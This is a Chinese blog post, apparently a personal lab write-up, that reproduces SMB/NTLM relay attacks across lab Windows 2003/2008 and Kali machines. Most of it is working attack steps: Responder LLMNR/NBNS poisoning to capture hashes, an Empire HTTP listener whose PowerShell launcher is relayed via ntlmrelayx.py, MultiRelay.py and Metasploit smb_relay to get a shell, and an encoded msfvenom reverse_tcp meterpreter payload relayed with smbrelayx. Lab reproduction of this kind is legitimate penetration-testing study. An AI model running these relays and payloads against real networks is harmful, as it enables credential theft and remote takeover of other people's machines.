美文网首页
SMB relay攻击复现

SMB relay攻击复现

作者: gg大宇 | 来源:发表于2020-04-16 21:32 被阅读0次

    三台机器
    kali:192.168.64.133
    win2008:192.168.64.135
    win2003:192.168.64.134

    使用responder

    (需要访问一个不存在的共享路径,因为要降到LLMNR NBNS)


    image.png

    然后去访问一个不存在的共享路径 dir \dc\d$
    然后就抓到hash了

    image.png

    responder充其量只有一个回显hash功能,可以结合ntlmrelayx.py和Empire框架进行进一步利用
    修改/etc/responder/Responder.conf禁用SMB和HTTP功能。
    执行responder -I eth0 -r -d -v
    利用empire


    image.png

    创建一个listeners

    listeners 
    uselistener http
    set Host http://192.168.64.132:8080
    set Port 8080
    set Name test
    execute
    
    image.png

    生成powershell命令:
    launcher powershell

    image.png

    开启中继,python3 ntlmrelayx.py -t 192.168.64.134 -c 'powershell脚本生成的内容'

    image.png

    然后这边就开始毒化了


    image.png

    将Windows2003的密码改为与Windows2008一样之后,资源管理器访问\test,终于成功了。


    image.png image.png image.png

    排错:
    1、Unexpected keyword argument 'randomize'
    https://github.com/SecureAuthCorp/impacket/issues/781
    2、有个日志的参数有问题,把那行注释掉就好了

    MultiRelayx.py拿下shell

    利用Impacket套件中的MultiRelay.py脚本进行中继攻击
    先用responder工具包里面的RunFinger.py脚本进行扫描(nmap皆可)来查看域内机器SMB签名的开放情况
    ./RunFinger.py -i 192.168.64.0/24


    image.png

    发现 SMB 签名都已禁用了,接下来开始 利用
    python MultiRelay.py -t 192.168.64.134 -u ALL


    image.png

    现在 SMB 已经由 MultiRelay.py 脚本来进行中继,我们需要修改一下 Responder.conf 脚 本,不让其对 hash 进行抓取

    image.png

    重启Responder.py 准备毒化


    image.png

    此时去win2003的机器上 传递一个SMB流量

    image.png image.png

    使用msf的smb_relay(MS-08 068)

    image.png

    win2003 cmd输入dir \192.168.64.133\c$ kali中就能看到:


    image.png

    直接就getshell了,因为是系统服务:


    image.png

    Impacket中的smbrelayx

    先生成一个msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.133 LPORT=4445 -e x86/shikata_ga_nai -f exe -o ~\test.exe

    image.png
    image.png

    然后使用监听模块(exploit -j是将得到的session放到后台)


    image.png

    运行smbrelayx.py(需要python3的环境),随后在Windows2003上执行dir \192.168.64.133\c$


    image.png

    成功获得会话


    image.png

    03的登录日志:


    image.png

    相关文章

      网友评论

          本文标题:SMB relay攻击复现

          本文链接:https://www.haomeiwen.com/subject/dvolvhtx.html